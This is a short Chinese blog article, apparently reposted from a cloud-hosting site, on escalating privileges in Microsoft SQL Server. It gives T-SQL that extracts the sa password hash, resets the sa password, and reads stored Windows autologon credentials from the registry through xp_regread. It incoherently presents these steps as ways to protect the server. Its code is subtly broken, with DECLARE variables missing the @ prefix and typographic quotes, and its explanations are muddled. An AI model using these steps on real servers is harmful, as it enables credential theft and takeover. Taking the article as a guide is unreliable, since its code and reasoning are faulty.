MSSQL中精准的提权手段：解放数据库控制权

限

MSSQL中精准的提权手段：解放数据库控制权限

针对网络安全攻击，通常攻击目标是盗取或破坏敏感信息。MSSQL服务器的控制权限对数据库的安全可靠性起到重要作用。因此，利用MSSQL中的授权提升，能够取得更高的权限能够采取有效的措施保护数据库安全。

MSSQL中的提权手段可以分为常规提权和精准提权。常规提权主要是通过弱口令来获得更高等级的权限，例如，使用sa帐号进行提权，或利用XP_cmdshell,使用脚本获得更高等级的帐号。但是这类方法的弊端是容易被发现，并且影响的权限不精确。

而精准提权方法，是利用系统内置的可以提升权限的特殊功能，例如HASH值破解、事件注册表破解等。利用这些技术提升用户对数据库接口程序的控制权限，不但可以精准而且不明显。

HASH值提升权限，是利用MSSQL中存储的身份认证hash值来获得控制权限。可以通过HASH值来破解sa帐号的密码，和使用专用程序来获得更多的系统权限。

例如：

USE MASTER

GO

–只有数据库管理员有履行的权限

–查询哈希值

SELECT name,master.dbo.fn_varbintohexstr(password_hash)

FROM sys.sql_logins WHERE name = ‘sa’

GO

–提升权限

EXEC sp_password NULL, ‘newpassword’, ‘sa’

GO

事件注册表提升权限，是利用MSSQL支持特殊函数，利用xp_regread函数读取Windows注册表中的内容，以获得更多的权限：

–只有数据库管理员有履行的权限

USE MASTER

GO

–获得SYSTEM帐号

DECLARE user_name varchar(50)

DECLARE user_pass varchar(50)

EXEC xp_regread ‘HKEY_LOCAL_MACHINE’,

‘SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon’,

‘DefaultUserName’, @user_name OUT

EXEC xp_regread ‘HKEY_LOCAL_MACHINE’,

‘SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon’,

‘DefaultPassword’, @user_pass OUT

PRINT @user_name

PRINT @user_pass

GO

通过上述两种技术，可以精准的提取更高的控制权限，来保护MSSQL服务器安全。

MSSQL中有一整套安全措施，但有时不一定足够。当用户希望能够快速和精准的提升数据库控制权限时，利用提这类方式中MSSQL中的精准提权功能。同时也能够为系统安全管理人员提供一套实现权限精准提升的方案，以便加强MSSQL服务器的安全性。

本文来源：https://www.yuntue.com/post/102024.html | 云服务器网，转载请注明出处！